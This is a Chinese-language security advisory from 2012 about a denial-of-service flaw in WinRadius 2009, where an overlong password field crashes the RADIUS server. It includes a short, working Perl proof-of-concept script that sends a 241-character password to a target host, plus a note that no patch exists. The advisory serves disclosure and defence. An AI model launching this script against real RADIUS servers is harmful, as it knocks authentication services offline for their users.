WinRadius密码选项大小验证缓冲区溢出漏洞
WinRadius密码选项大小验证缓冲区溢出漏洞
发布日期:2012-05-28
更新日期:2012-05-29
受影响系统:
WinRadius WinRadius 2009
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 53702
WinRadius是基于标准RADIUS协议的适合国内实际情况的拨号认证、记帐、记费商业软件。
WinRadius 2009之前版本在实现上存在拒绝服务漏洞,WinRadius服务器绑定了udp端口1812和1813,但没有验证域选项大小,在发送超过240个字符时,攻击者可利用此漏洞造成服务器崩溃。
<*来源:demonalex
链接:http://www.securityfocus.com/archive/1/522878
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
demonalex ()提供了如下测试方法:
-----------------------------------------------------------
#!/usr/bin/perl
use Authen::Simple::RADIUS;
$|=1;
$host=shift || die "usage: $0 host\n";
print "Launch Attack ... \n";
$username=int(rand(10)).int(rand(10)).int(rand(10));
$password='A'x241;
$secret=int(rand(10)).int(rand(10)).int(rand(10));
$radius = Authen::Simple::RADIUS->new(
host => $host,
secret => $secret
);
$radius->authenticate( $username, $password );
print "Finish!\n";
exit(1);
-----------------------------------------------------------
建议:
--------------------------------------------------------------------------------
厂商补丁:
WinRadius
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.elite-school.com/saas/WinRadius/
评论暂时关闭